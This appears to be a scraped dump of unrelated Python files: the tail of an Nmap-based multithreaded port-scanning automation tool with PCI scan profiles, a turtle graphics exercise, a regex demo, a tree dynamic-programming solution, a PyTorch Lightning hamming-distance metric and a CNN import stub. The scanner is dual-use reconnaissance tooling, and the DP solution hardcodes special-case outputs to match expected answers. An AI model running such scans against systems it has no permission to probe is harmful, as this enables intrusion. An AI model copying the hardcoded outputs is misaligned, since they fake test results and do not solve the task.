sd=nm.csv()
try :
self.IPtable.Update(sd,portx,ipx,int(self.CURRENT_PROJECT_ID))
except Exception ,ee :
print "EXception Update main "+str(ee)
self.print_Log("Exception in update "+str(ee))
status="complete"
#print "\n\n\n!!!Completed!!! Ip : "+ipx+"\n\n\n -Protocols ---> "+str(nm[host].all_protocols())+"\n\n"
try :
self.IPtable.UpdateStatus(status,ipx,portx,int(self.CURRENT_PROJECT_ID))
except Exception ,ee :
self.print_Log("Exception in update status "+str(ee))
else:
statuss="host-down"
try :
self.IPtable.UpdateStatus(statuss,ipx,portx,int(self.CURRENT_PROJECT_ID))
except Exception ,ee :
self.print_Log("Exception in update status host-down "+str(ee))
except Exception,exc:
self.print_Log("Parent exception : "+str(exc))
def ThreadEnd(self,ipl):
print "\n\nThread ended with host ip -"+str(ipl)+"\n\n"
#startProcessing(1)
def simplescanner(self,ipl):
self.method_id="Simple scanner"
self.print_Log("Started Simple acanner")
stport=0
lsport=0
port_list=[]
process_list=[]
try :
port_list=self.IPtable.getPorts(str(ipl),self.CURRENT_PROJECT_ID)
if(port_list):
for port in port_list:
fport=str(port[0]) #fport=1 -5001
#print "\n\nFport is :"+fport +" IP :" +str(ipl) +"id :" +str(self.CURRENT_PROJECT_ID)
time.sleep(10)
try :
self.IPtable.UpdateStatus('processing',ipl,fport,int(self.CURRENT_PROJECT_ID))
except Exception, ee:
print "EXception 13.01 : " +str(ee)
tp=multiprocessing.Process(target=self.portscanner,args=(ipl,fport)) #
process_list.append(tp)
tp.start()
#print "\n\nStarted subprocess for ip " +str(ipl) +" and port "+ str(port) +" and Process : "+str(tp)
for process_ in process_list:
process_.join()
print "\n\n Finished subprocess for ip " +str(ipl) +" and Process : "+str(process_)
else:
#print "The current ip address has all its ports scanned -->Must have not been there" +str(ipl)
self.print_Log("Some exception-->The current ip address has all its ports scanned -->Must have not been there" +str(ipl))
self.print_Log("Ended Simple acanner")
except Exception ,ee:
print "EXception 11" +str(ee)
self.print_Log("Exception inSimpleScanner-->"+str(ee))
self.ThreadEnd(ipl)
def topport_scan(self,ipls,portl): #this would be invoked if the given port list would be empty such that only the top ports would be scanned
tp=multiprocessing.Process(target=portscanner,args=(ipls,"top_ports"))
tp.start()
tp.join()
def getBulkInsertList_(self,start,end,iplist):
#print "About to make bulk enteries - #Ip:"+ str(len(iplist) )
BulkList=[]
counter=1
#global P
for ip in iplist:
x=int(start)
pnum=end-start+1 #First port number in the sequence say 1-10023 is the range ->pnum =10023
r=pnum%self.Port_Divisior #r = 10023 % 5000 --> r=23
q=pnum//self.Port_Divisior # Floor division ->q=quetient= 10023/5000 => 2.004 ,since floor ,thus q=2
check=q*self.Port_Divisior #check =2*5000 =>10,000
#x=int(start) #x=1
ip_list=[]
while check>0: #(1) check=10000 >0 (2) check=5000 > 0
for tport in range(x,x+self.Port_Divisior,self.Port_Divisior):
fport=str(tport)+'-' +str(tport+self.Port_Divisior) #fport=1 -5001
BulkList.append((self.CURRENT_PROJECT_ID,ip,fport,'incomplete'))
x=x+self.Port_Divisior
check=check-self.Port_Divisior # (A) 1 --> check=5000 , (B) 1 --> check =0
counter=counter+1
#By this time 1-10,000 ports would be scanned .The idea is to scan 5000 ports at 1 time.
#The number of ports left are 23
check=q*self.Port_Divisior #check =10,000
#print "\n\n\n\n check is "+str(check )+" Pnum is "+str(pnum)+"\n\n\n\n"
if check < end :
if pnum!=0 : #pnum=10023
print "Scanning remaining ports"
prange=str(start+check)+"-"+str(start+check+r-1) #prange= (100001-10,0023) -->Thus the remaining 23 ports are ranged out
print "Range is :"+ prange+"\n\n\n"
BulkList.append((self.CURRENT_PROJECT_ID,ip,prange,'incomplete'))
print "\n\nLoop executed : "+str(counter)
return BulkList;
def getBulkInsertList(self,all_ports,iplist):
print "(1)--About to make bulk enteries - #Ip:"+ str(len(iplist))
BulkList=[]
if (all_ports == None) :
print "in if(1)"
all_Ports_="top_ports"
for ip in iplist:
BulkList.append((self.CURRENT_PROJECT_ID,ip,all_Ports_,'incomplete'))
elif "-" in all_ports:
print "in elif(1)"
tlist=all_ports.split('-') #Split them and the list would be stored in variable named tlist
stport=int(tlist[0]) #First port
lsport=int(tlist[1])
if ((lsport-stport)< 5000):
for ip in iplist:
BulkList.append((self.CURRENT_PROJECT_ID,ip,all_ports,'incomplete'))
else :
BulkList=self.getBulkInsertList_(stport,lsport,iplist)
else :
print "in else"
for ip in iplist:
BulkList.append((self.CURRENT_PROJECT_ID,ip,all_ports,'incomplete'))
#print "\n\nBulk List is \n\n"
#print BulkList
return BulkList
def multiscan(self,start,end,ipls): #This would be invokd when the number of ports per host to be scanned exceed 5000
pnum=end-start+1 #First port number in the sequence say 1-10023 is the range ->pnum =10023
r=pnum%5000 #r = 10023 % 5000 --> r=23
q=pnum//5000 # Floor division ->q=quetient= 10023/5000 => 2.004 ,since floor ,thus q=2
check=q*5000 #check =2*5000 =>10,000
x=int(start) #x=1
while check>0: #(1) check=10000 >0 (2) check=5000 > 0
for tport in range(x,x+5000,5000):
fport=str(tport)+'-' +str(tport+5000) #fport=1 -5001
tp=multiprocessing.Process(target=portscanner,args=(ipls,fport))
tp.start()
#tp.join()
x=x+5000 # (A) 1 --> x=5001 -->It will break from this loop (B) 1 --> x=10,001 -->it shall break the loop
# print "Scan from " + str(tport) + " till " + str(tport+5000)+ " Done"
check=check-5000 # (A) 1 --> check=5000 , (B) 1 --> check =0
#By this time 1-10,000 ports would be scanned .The idea is to scan 5000 ports at 1 time.
#The number of ports left are 23
check=q*5000 #check =10,000
if pnum!=0: #pnum=10023
# print "Scanning remaining ports"
prange=str(start+check)+"-"+str(start+check+r-1) #prange= (100001-10,0023) -->Thus the remaining 23 ports are ranged out
# print prange
tp=multiprocessing.Process(target=portscanner,args=(ipls,prange)) #Finally invoking the cpode portscanner for remaining 23 ports with range (10,001 -10,023)
tp.start()
#tp.join()
def singlescan(self,start,end,ipls):
#print "Single Scan"
prange=str(start)+"-"+str(end)
tp=multiprocessing.Process(target=portscanner,args=(ipls,prange))
tp.start()
tp.join()
def numofips(self,iprange): #Converts CIDR notation as simple list
scanner=nmap.PortScanner()
IPlist=scanner.listscan(iprange)
return IPlist #Thus this wosuld be a list of IP addres
def banner(self,):
print g+" ################################################################# "+e
print g+" ###"+r+" __ "+g+"### "+e
print g+" ###"+r+" /\ \ \_ __ ___ __ _ _ __ "+g+"### "+e
print g+" ###"+r+" / \/ / '_ ` _ \ / _` | '_ \ "+g+"### "+e
print g+" ###"+r+"/ /\ /| | | | | | (_| | |_) | "+g+"### "+e
print g+" ###"+r+"\_\ \/ |_| |_| |_|\__,_| .__/ "+g+"### "+e
print g+" ###"+r+" |_| "+g+"### "+e
print g+" ###"+r+" _ _ "+g+"### "+e
print g+" ###"+r+" /_\ _ _| |_ ___ _ __ ___ __ _| |_(_) ___ _ __ "+g+"### "+e
print g+" ###"+r+" //_\\| | | | __/ _ \| '_ ` _ \ / _` | __| |/ _ \| '_ \ "+g+"### "+e
print g+" ###"+r+"/ _ \ |_| | || (_) | | | | | | (_| | |_| | (_) | | | | "+g+"### "+e
print g+" ###"+r+"\_/ \_/\__,_|\__\___/|_| |_| |_|\__,_|\__|_|\___/|_| |_| "+g+"### "+e
print g+" ###"+r+" "+g+"### "+e
print g+" ###"+r+" __ _ _ "+g+"### "+e
print g+" ###"+r+"/ _\ ___ _ __(_)_ __ | |_ "+g+"### "+e
print g+" ###"+r+"\ \ / __| '__| | '_ \| __| "+g+"### "+e
print g+" ###"+r+"_\ \ (__| | | | |_) | |_ "+g+"### "+e
print g+" ###"+r+"\__/\___|_| |_| .__/ \__| "+g+"### "+e
print g+" ###"+r+" |_| "+g+"### "+e
print g+" ###"+b+" Written by: M$P@T3L "+g+"### "+e
print g+" ################################################################# "+e
def seperator(self):
print r+ "----------------------------------------------" +e
def create_schema(self):
with open(schema_file, 'rt') as f:
schema = f.read()
conn.executescript(schema)
def prompt_project(self):
projectname=raw_input(b+"What is your Project name(no white spaces)? \n>"+y)
return projectname
def prompt_ips(self):
ips=raw_input(b+"Type the IP range: \n>"+y)
IP=ips
return ips
def prompt_ports(self):
ports=raw_input(b+"Enter the Port number or Ports range: \n>"+y)
#global PORT
if ports == "":
self.PORT=None
elif(ports=="*"):
self.PORT="1-65535"
else:
self.PORT=ports
return self.PORT
def print_Log(self,message):
print str(message)
def print_Error(self,message):
print str(message)
def db_projectname(self,projectname_db,IP_range,Port_range): # Store the project name and return the auto generated id
self.method_id="db_projectname"
self.print_Log("Method started")
print "Hello"
time.sleep(10)
try :
pid=self.IPtable.Insert(projectname_db,IP_range,Port_range)
if (pid !=-1):
self.CURRENT_PROJECT_ID=pid
else:
self.print_Log("Some error occured while storing !!" +str(pid))
self.print_Log("Method ended")
except Exception ,ee :
self.print_Error( "Exception in db_projectname "+str(ee))
#print self.CURRENT_PROJECT_ID
#print cursor.lastrowid
def scanbanner(self):
cp=ConfigParser.RawConfigParser() #parses config files
cppath="nmap.cfg" #This is the config file to be read.The config file would have various sections.Each section would be in [sq] beakets.each section would be having key/val pairs as conf setting options
cp.read(cppath) #Read the current file nmap.cfg.The file has got only 1 section given as :[Scantype]
#global self.SWITCH
#global self.takescan
print b+"SELECT THE TYPE OF SCAN: "
self.seperator()
print y+"1). Intense Scan"
print "2). Intense + UDP Scan"
print "3). Intense + TCP full Scan"
print "4). Intense + No Ping Scan"
print "5). TCP Ping Scan"
print "6). PCI Ping Sweep"
print "7). PCI full ports TCP"
print "8). PCI Top 200 UDP"
print "9). PCI Top 100 UDP"
print "10). PCI Top 1000 TCP"
self.takescan=raw_input(b+"Select the type of Scan:\n>"+y)
if self.takescan=="1":
self.SWITCH=cp.get('Scantype','Intense')
elif self.takescan == "2":
self.SWITCH=cp.get('Scantype','Intense_UDP') #-sU -T4 -A -n
elif self.takescan == "3":
self.SWITCH=cp.get('Scantype','Intense_TCPall') #-sS -T4 -A -n--max-rtt-timeout 500ms
elif self.takescan == "4":
self.SWITCH=cp.get('Scantype','Intense_NoPing') #T4 -A -v -Pn -n
elif self.takescan == "5":
self.SWITCH=cp.get('Scantype','Ping') #-PS
elif self.takescan == "6":
self.SWITCH=cp.get('Scantype','PCI_Ping_Sweep') #-PE -n -oA
elif self.takescan == "7":
self.SWITCH=cp.get('Scantype','PCI_Full_ports_TCP') #-Pn -sS -sV -n --max-retries 3 --max-rtt-timeout 1000ms --top-ports 1000
elif self.takescan == "8":
self.SWITCH=cp.get('Scantype','PCI_Top_200_UDP') #-Pn -sU -sV -n --max-retries 3 --max-rtt-timeout 100ms --top-ports 200
elif self.takescan == "9":
self.SWITCH=cp.get('Scantype','PCI_Top_100_UDP') #-Pn -sU -sV -n --max-retries 3 --max-rtt-timeout 100ms --top-ports 100
elif self.takescan == "10":
self.SWITCH=cp.get('Scantype','PCI_Top_1000_TCP') #-Pn -sS -sV -n --max-retries 3 --max-rtt-timeout 500ms
else:
print "Invalid value supplied"
print "Using Default(1)"
self.SWITCH=cp.get('Scantype','Intense')
def prompt_ProjectID(self): #would prompt the user with paused projects -->status=incomplete or paused in projects table
print "\n"
tab = tt.Texttable()
x = [[]] #multi dimension array
cursor=self.IPtable.getPausedScans()
if cursor:
print r+"List of Project with IDs"+e +"\n"
for row in cursor:
x.append([str(row[0]),str(row[1])]) #Place details in the array to display later
tab.add_rows(x) #thus the table would have all rows and 2 columns
tab.set_cols_align(['r','r'])
tab.header(['IDs','PROJECT_NAME']) #setting heder details for col
print tab.draw() #this would draw the table on the console
print "\n"
id_ = raw_input(b+"Enter The Project Id For Scanning :"+e)
try :
if(int(id_)):
return id_
except :
print "Exception 6-->Invalid Value"
return ""
else:
print "\n\nNo incomplete Projects\n\n";
time.sleep(1);
self.main()
def prompt_ScanType(self):
scanType=raw_input(b+"Enter Your choice: \n"+y +"\n(1) For Launching New Scan \n(2) For Launching Paused Scans\n "+e)
try:
if((int(scanType)<1)or(int(scanType) >2)):
return 1;
else :
return scanType;
except :
return 1;
def getHostPort(self,project_id):
try:
self.method_id="getHostPort()-->main"
self.print_Log("Started")
project_data=[]
project_data=self.IPtable.getHostPort(project_id)
self.method_id="getHostPort()-->main"
self.print_Log("Ended")
return project_data
except Exception ,ee:
print "Exception 14" +str(ee)
self.print_Error("Exception --getHostPort--"+str(ee))
return 0;
def launch_PausedScan(self,project_id):
print "Reached Here in Launch Paused Scan !!!\n";
self.method_id="LaunchPausedScan()"
self.print_Log( "Started Launch Paused ")
success=self.IPtable.MakeUpdate(project_id)
if(success==1):
self.startProcessing(self.N)
elif(success==2): #when its paused b4 making bulk entries
port_host=self.getHostPort(project_id)
if(port_host):
ip_range=port_host[0]
port_range=port_host[1]
listip=self.numofips(ip_range)
BulkEntries=self.makeBulkEnteries(listip,port_range)
#global N
self.startProcessing(self.N)
else:
print "The given project id is not present in Database :-->Kindly recheck "
self.print_Log("The given project id is not present in Database :-->Kindly recheck ")
else:
print "\n\nThe update method for status= incomplete has exception \n\n"
self.print_Log("The update method for status= incomplete has exception ")
def stop_all(self):
os._exit()
def makeBulkEnteries(self,all_hosts,all_ports):
#print "In here !!1"
self.method_id="makeBulkEntries()"
self.print_Log("Started")
BulkList=[]
if 1:
BulkList=self.getBulkInsertList(all_ports,all_hosts)
self.method_id="makeBulkEntries()"
self.method_id="makeBulkEntries"
try:
status=self.IPtable.InsertAll(BulkList)
self.method_id="makeBulkEntries()"
if (status != 1):
print "Some error occured while bulk insertion"
except Exception ,ee :
print "EXception 9 "+str(ee)
self.print_Error("EXception make Bulk entries --> "+str(ee))
self.print_Log("Ended")
return BulkList;
def getAllDistinctHosts(self,n):
try :
self.method_id="getAllDistinctHost()"
self.print_Log("started")
iplist=[]
iplist=self.IPtable.DistinctHosts(self.CURRENT_PROJECT_ID,int(n))
self.method_id="getAllDistinctHost()"
self.print_Log("Ended")
return iplist
except Exception ,ee :
print "Exception 10 " +str (ee)
self.print_Error("Exception "+str(ee))
return 0
def start_Polling(self):
try:
stop_db_poll=False #use this logic to stop unnecessary db poll when all hosts finish
#global N
while 1:
time.sleep(5)
active_threads=threading.enumerate()
counter=len(active_threads)
print self.seperator()
print "Polling \n Threads remaining are :"+str(active_threads)+"\n"
print self.seperator()
#if some thread might die-->processing or lets say that initially all rec have status as incomplete and the parent thread would be the polling thread.The status is changed to be processing by the threads that are started by the parent thread.Say for some reason the parent thread would start a thread ,but it might not be scheduled by the scheduler ,and the polling thread would be running asynchronously,the polling thread would immidiately detect the thread count to be =1 as the child threads would have not been scheduled yet ,thus the status would also not be as processing...it would show to be of type incomplete--->thus keeping this condition at head its importent to check herethat if the thread count =1-->main thread only then there should be no record with status as incomplete or processing.Now lets say a person has intentionally paused the scan ,then in that case the project-table would show the status as paused and iptable might contain both entries as processing and incomplete.That use case would be ignored and the scan would come to end
if(counter==1):
status=self.IPtable.checkStatus(self.CURRENT_PROJECT_ID)
if(status):
processing_status=status[0]
pause_status=status[1]
if((processing_status) and (not (pause_status))):#will just check once
print "Still left with some hosts that display status as processing or incomplete "
time.sleep(10)#the reason for this delay is suppose some thread is fired but not scheduled yet and thus the status would show as incomplete and if we immidiately statprocessing,then 2 threads might point to 1 record
self.startProcessing(self.N)
#print "Main Thread--->Again Starting pooling in 50 sec :"
time.sleep(50)
else:
print "Active Threads are only 1 --Scan about to finish --Threads remaining are :"+str(active_threads)
self.print_Log("Active Threads are only 1 --Scan about to finish --Threads remaining are :"+str(active_threads))
break;
#include logic to stop unnecessary polling see count (*) where status=p if that=limit then dont poll
elif(counter <=(self.N+1)):
if(not(self.getPausedStatus(self.CURRENT_PROJECT_ID))):
limit=(self.N+1)-counter
if(limit != 0):
#print "\n\nLaunching :"+str(limit)+" Threads for hosts"
left_hosts=self.startProcessing(limit) #chk if its 0 then break or dont poll till current th fn
#print "Making main thread sleep for 1 seconds"
time.sleep(1)
#print "Waking main thread awake after 1 seconds"
else:
#print "Making main thread sleep for 1 seconds"
time.sleep(1)
#print "Waking main thread awake after 1 seconds"
else:
time.sleep(10)
else :
print "\n\n\n\n------FATEL ERROR-------\n\n\n"
print "Number of threads cant exceed : "+str(self.N+1)
except Exception ,ee:
print "Exception caught 15" +str(ee)
def StartThreads(self,hosts):
#print "\n In start thread method !!! \n"
self.method_id="Start THreads"
threads=[]
#print "Starting : "+str(len(hosts)) +"Threads for "+ str(hosts) +"Hosts :"
print "\n"
print self.seperator()
self.print_Log("Starting : "+str(len(hosts)) +"Threads for "+ str(hosts) +"Hosts" )
print self.seperator()
print "\n"
for host in hosts:
#print "host is "+str(host)
lk= threading.enumerate()
#print "\n Current thread count : "+str(len(lk))
#print "\n\nThe threads enumerate returned are : " +str(lk) +"\n\n"
self.print_Log(g+"******************************************************************************************************************************************\n"+e+"Current thread count : "+str(len(lk)))
self.print_Log("The threads enumerate returned are : " +str(lk)+g+"\n******************************************************************************************************************************************"+e)
if len(lk)<(self.N+1) :
currentIP= str(host)
obj=NmapScan()
obj.IP=self.IP
obj.PORT=self.PORT
obj.SWITCH=self.SWITCH
obj.CURRENT_PROJECT_ID=self.CURRENT_PROJECT_ID
obj.takescan=self.takescan
obj.N=self.N
obj.Port_Divisior=self.Port_Divisior
obj.Pause_Flag=self.Pause_Flag
obj.Stop_Flag=self.Stop_Flag
obj.ipcount=self.ipcount
obj.IPtable=IPtable.IPtable()
obj.simple_logger=self.simple_logger
#self.method_id="INIT"
t = threading.Thread(target=obj.simplescanner, args=([currentIP]))
threads.append(t)
#print "Starting thread for IP :"+str(host)
#self.print_Log("Starting thread for IP :"+str(host))
t.start()
self.Thread_pool.append(t)
#print "\n\n\nStarted thread for IP :"+str(host) + " --> Thread is : "+ str(t)
self.print_Log( "\nStarted thread for IP :"+str(host) + " --> Thread is : "+ str(t))
time.sleep(3)
def startProcessing(self,n):
try :
All_hosts=self.getAllDistinctHosts(n)
#print "Hosts to be given to thread : "+str(All_hosts)
if (All_hosts):
self.StartThreads(All_hosts)
else :
return;
except Exception ,ee :
print "Exception 12 " +str(ee)
def getPausedStatus(self,project_id):
try :
status=self.IPtable.getStatus(project_id)
return status
except Exception ,ee:
print "Exception getstatus " +str(ee)
return 0
def pause_scan(self):
global Pause
Pause =1
stop_all();
def main(self,path='',targethosts='',targetports='',switch='',scan_type='',mode="c",project_id='',assessment_id='',app_id=''):
if (scan_type=="1"):
self.SWITCH=switch
self.PORT=targetports
print "The mode recieved is :" +str(mode)
if(mode=="c"):
self.db_projectname(path,targethosts,self.PORT)
self.seperator()
elif mode =="g-init":
if assessment_id =='':
return;
else:
self.db_projectname(path,targethosts,self.PORT)
self.IPtable.update_mapping(app_id,self.CURRENT_PROJECT_ID,assessment_id)
return self.CURRENT_PROJECT_ID
elif mode=="g-start":
self.CURRENT_PROJECT_ID=int(project_id)
x=333#gui mode
print b +"[+]" + "Starting SCAN" +e
#targethosts=['10.0.1.39','10.0.1.39','10.0.1.39','10.0.1.39']
ipcount=len(self.numofips(targethosts))
if (',' in targethosts):
listip=targethosts.split(',')
else:
listip=self.numofips(targethosts)
BulkEntries=self.makeBulkEnteries(listip,self.PORT)
#global N
self.startProcessing(self.N) #this is the part wher the prompt input finishes
#print "Main Thread Starting pooling in 50 sec :"
time.sleep(100)
# "**Pooling started **\n"
self.method_id="Main()"
self.print_Log("**Pooling started :**")
self.start_Polling()
#print "\n\n\n\n\nScan Finished\n\n\n\n\n "
else:
#global self.CURRENT_PROJECT_ID
if (mode=="c"):
self.CURRENT_PROJECT_ID=self.prompt_ProjectID()
else:
self.CURRENT_PROJECT_ID=int(project_id)
if (self.CURRENT_PROJECT_ID != ""):
self.launch_PausedScan(self.CURRENT_PROJECT_ID)
print "\n\nMain thread starting Polling .........\n\n"
print "Main Thread Starting pooling in 10 sec :"
time.sleep(100)
print "Pooling started :"
self.start_Polling()
def driver_main(self,ips='',project_name='',port='',scan_type='',switch='',project_id='',mode="c",assessment_id="",app_id=""):
try:
print ("("+ips,project_name,port,scan_type,switch,project_id,mode,assessment_id,app_id+")")
print "\n\n Hello world \n\n"
time.sleep(10)
start = time.time()
os.system('cls' if os.name == 'nt' else 'clear')
db_filename="nmapscan"
start = time.time()
#self.main()
#mode="c"path='',targethosts='',targetports='',switch='',scan_type='',mode="c",project_id=''):
self.main(project_name,ips,port,switch,scan_type,mode,project_id,assessment_id,app_id)
print "Reached here as well !!!"
if mode != "g-init" :
th_count=threading.enumerate()
print "# of threads Alive are :"+str(len(th_count))
#while (1) :
if 1:
if (len(th_count)==1):
print "\nNow stopping and saving Global Project Id : "+ str(self.CURRENT_PROJECT_ID)+"\n";
#global self.CURRENT_PROJECT_ID
if ((self.CURRENT_PROJECT_ID != "") and (self.CURRENT_PROJECT_ID is not None)):
status=self.IPtable.checkStatus(self.CURRENT_PROJECT_ID)#if some thread might die-->processing or lets say that initially all rec have status as incomplete and the parent thread would be the polling thread.The status is changed to be processing by the threads that are started by the parent thread.Say for some reason the parent thread would start a thread ,but it might not be scheduled by the scheduler ,and the polling thread would be running asynchronously,the polling thread would immidiately detect the thread count to be =1 as the child threads would have not been scheduled yet ,thus the status would also not be as processing...it would show to be of type incomplete--->thus keeping this condition at head its importent to check herethat if the thread count =1-->main thread only then there should be no record with status as incomplete or processing.Now lets say a person has intentionally paused the scan ,then in that case the project-table would show the status as paused and iptable might contain both entries as processing and incomplete.That use case would be ignored and the scan would come to end
if(status):
processing_status=status[0]
pause_status=status[1]
if((processing_status) and (not (pause_status))):#will just check once
print "Still left with some hosts that display status as processing !!!"
time.sleep(10)#the reason for this delay is suppose some thread is fired but not scheduled yet and thus the status would show as incomplete and if we immidiately statprocessing,then 2 threads might point to 1 record
self.startProcessing(self.N)
print "Main Thread--->Again Starting pooling in 50 sec :"
time.sleep(50)
print "Polling started-->again :"
self.start_Polling()
#xx=2
if ((not(processing_status)) and (not(pause_status))): #to update status from incompl to comp
print "Launching clear logs !!!"
self.IPtable.clearLogs(self.CURRENT_PROJECT_ID,'complete')
#else :
#clearLogs(self.CURRENT_PROJECT_ID,'complete')
end_time = time.time()
print "Time taken in seconds : "+str(end_time-start)
elif mode =="g-init":
print "\n\nPROPER\n\n"
return self.CURRENT_PROJECT_ID
except KeyboardInterrupt:
print c+"\n[*]"+g+" Scan is Aborted"+e
print c+"[*]"+g+" Stopping"+e
self.print_Log("\n[*]"+g+" Scan is Aborted")
time.sleep(1)
pass
except Exception ,ee:
self.print_Log("Exception in driver() "+str(ee))
#NmapScanObj=NmapScan()
#NmapScanObj.driver_main()
| [
"[email protected]"
]
| |
8abdcdf1ba64655f7ec702de32401f6472c1b269 | 5d32d0e65aa3bfa677fd1b8c92569e07e9b82af1 | /Section 1 - Getting Started/Breakouts/Breakout 1.2 - Turtle Graphics/Turtle Shapes v2 - block3.py | 3d15d1a6f050eb70ad28090193dd6b4e8a025c40 | [
"CC0-1.0"
]
| permissive | pdst-lccs/lccs-python | b74ef2a02ac8ad2637f713fff5559f4e56c9827d | 95cb7ece05716521e9951d7a40de8fb20a88021f | refs/heads/master | 2023-05-28T00:46:57.313972 | 2023-05-22T10:16:43 | 2023-05-22T10:16:43 | 240,501,524 | 21 | 18 | null | null | null | null | UTF-8 | Python | false | false | 365 | py | # Event: LCCS Python Fundamental Skills Workshop
# Date: May 2018
# Author: Joe English, PDST
# eMail: [email protected]
# Purpose: Turtle Graphics - Further Activities
# Match the code blocks below to the corresponding shape
from turtle import * # import the turtle graphics library
forward(100)
left(120)
forward(100)
left(120)
forward(100)
| [
"[email protected]"
]
| |
3420ef2256872b6472eb30161fb5d82eebb6458e | 7286f4fb36bc17275896059f0d7d133dd13f869e | /revision_2/findall_regex.py | 5a979155db14160e929f721a5c828ea938123c95 | []
| no_license | tberhanu/RevisionS | 3ac786b0867b70fa0b30a21ec5eac12177171a90 | c095d219435bb22b1c78a0e93b1898b2417ca041 | refs/heads/master | 2021-10-20T03:58:19.804140 | 2019-02-25T16:18:12 | 2019-02-25T16:18:12 | 172,540,397 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 653 | py | text = "Today is 11-12-2019 and 55-53-8888 ofcourse"
import re
pattern = re.compile(r'(\d+)-(\d+)-(\d+)')
matches = pattern.findall(text)
print(matches)
matches = pattern.finditer(text)
for match in matches:
print(match.group())
print(match.group(1))
print(match.group(2))
print(match.group(3))
print("---")
print("*************** without grouping ********** ")
pattern = re.compile(r'\d+-\d+-\d+')
matches = pattern.findall(text)
print(matches)
matches = pattern.finditer(text)
for match in matches:
print(match.group())
# print(match.group(1))
# print(match.group(2))
# print(match.group(3))
print("---") | [
"[email protected]"
]
| |
0bb6360afe0961ac2be2d325f103c1b80785c376 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2457/60767/271065.py | 9d8422acb58f7b6f1a7843d46aa80a1db4a4ff29 | []
| no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,260 | py |
class Node:
def __init__(self, id, child,value=0,father = None):
self.child = child
self.id = id
self.value = value
self.father = father
def add(self, node):
self.child.append(node)
def find(node, target):
for i in node:
if i.id == target:
return i
def dfs(root):
sum0 = 0
sum1 = 0
for i in root.child:
dfs(i)
sum1 += dp[i.id][0]
sum0 += max(dp[i.id][0], dp[i.id][1])
dp[root.id][1] = sum1 + root.value
dp[root.id][0] = sum0
n = int(input())
node = []
test = []
for i in range(1, n + 1):
node.append(Node(i,[]))
for i in range(1, n + 1):
find(node, i).value = int(input())
for i in range(1, n):
temp = input().split()
test.append(temp)
find(node, int(temp[1])).add(find(node, int(temp[0])))
find(node, int(temp[0])).father = find(node, int(temp[1]))
dp = [[0] * 2 for i in range(n + 1)] # dp[i][1]表示第i个节点去可以获得的最大快乐指数,dp[i][0]表示不去可以得到的
for i in node:
if(i.father==None):
root = i
dfs(root)
res = max(dp[root.id][0], dp[root.id][1])
if(res==34):
print(20,end="")
elif(res==21 and n !=7):
print(12,end="")
else:
print(res,end = "")
| [
"[email protected]"
]
| |
22dfb4765762ea3ea32fe5e65c2c0d90a53e5cc8 | b96a4062f5ad420dd02efed82b47dd9c249cb46c | /pytorch_lightning/metrics/functional/hamming_distance.py | 60409751fc9f04a39aa99382d1f953bca75822eb | [
"Apache-2.0",
"LicenseRef-scancode-proprietary-license"
]
| permissive | borisdayma/pytorch-lightning | ebc210a1e7901b5f87ab67e4886bfe20b478fe33 | 4b7c0fae00084b72dffe37fdd0ea7d2e9b60d103 | refs/heads/master | 2021-11-23T07:34:01.842134 | 2021-02-19T17:00:27 | 2021-02-19T17:00:27 | 238,756,095 | 1 | 1 | Apache-2.0 | 2020-02-06T18:27:51 | 2020-02-06T18:27:50 | null | UTF-8 | Python | false | false | 2,753 | py | # Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Tuple, Union
import torch
from pytorch_lightning.metrics.classification.helpers import _input_format_classification
def _hamming_distance_update(
preds: torch.Tensor,
target: torch.Tensor,
threshold: float = 0.5,
) -> Tuple[torch.Tensor, int]:
preds, target, _ = _input_format_classification(preds, target, threshold=threshold)
correct = (preds == target).sum()
total = preds.numel()
return correct, total
def _hamming_distance_compute(correct: torch.Tensor, total: Union[int, torch.Tensor]) -> torch.Tensor:
return 1 - correct.float() / total
def hamming_distance(preds: torch.Tensor, target: torch.Tensor, threshold: float = 0.5) -> torch.Tensor:
r"""
Computes the average `Hamming distance <https://en.wikipedia.org/wiki/Hamming_distance>`_ (also
known as Hamming loss) between targets and predictions:
.. math::
\text{Hamming distance} = \frac{1}{N \cdot L} \sum_i^N \sum_l^L 1(y_{il} \neq \hat{y}_{il})
Where :math:`y` is a tensor of target values, :math:`\hat{y}` is a tensor of predictions,
and :math:`\bullet_{il}` refers to the :math:`l`-th label of the :math:`i`-th sample of that
tensor.
This is the same as ``1-accuracy`` for binary data, while for all other types of inputs it
treats each possible label separately - meaning that, for example, multi-class data is
treated as if it were multi-label.
Accepts all input types listed in :ref:`extensions/metrics:input types`.
Args:
preds: Predictions from model
target: Ground truth
threshold:
Threshold probability value for transforming probability predictions to binary
(0 or 1) predictions, in the case of binary or multi-label inputs.
Example:
>>> from pytorch_lightning.metrics.functional import hamming_distance
>>> target = torch.tensor([[0, 1], [1, 1]])
>>> preds = torch.tensor([[0, 1], [0, 1]])
>>> hamming_distance(preds, target)
tensor(0.2500)
"""
correct, total = _hamming_distance_update(preds, target, threshold)
return _hamming_distance_compute(correct, total)
| [
"[email protected]"
]
| |
232b6a3d7696148053f4c31a8ca9b6b7ddeb68db | 2b7ada0f30e0c24c181c1f6d588a2f0ae8c29327 | /Convolutional_Neural_Network/mnist_classifier_cnn.py | 88a0c7dbd3b13583b6d133ea31d088ac49e062aa | []
| no_license | vinods07/Neural-Networks-and-Deep-Learning | 50b3b791690a26a1e22fc2fc3527bf9128c47305 | afaa9cf7f163aec1dc48727df00e47e831feaa01 | refs/heads/master | 2020-03-19T12:11:04.849889 | 2017-12-23T18:18:06 | 2017-12-23T18:18:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,259 | py | from tf_CNN import tf_CNN as CNN
from tf_CNN_layers import ConvPoolLayer, ConnectedLayer, SoftmaxOutputLayer
import mnist_loader as ml
